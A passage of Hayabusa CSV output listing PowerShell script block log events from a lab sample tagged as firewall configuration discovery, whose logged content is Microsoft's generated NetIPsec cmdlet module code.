'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = 
${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' function Get-NetIPsecMainModeRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
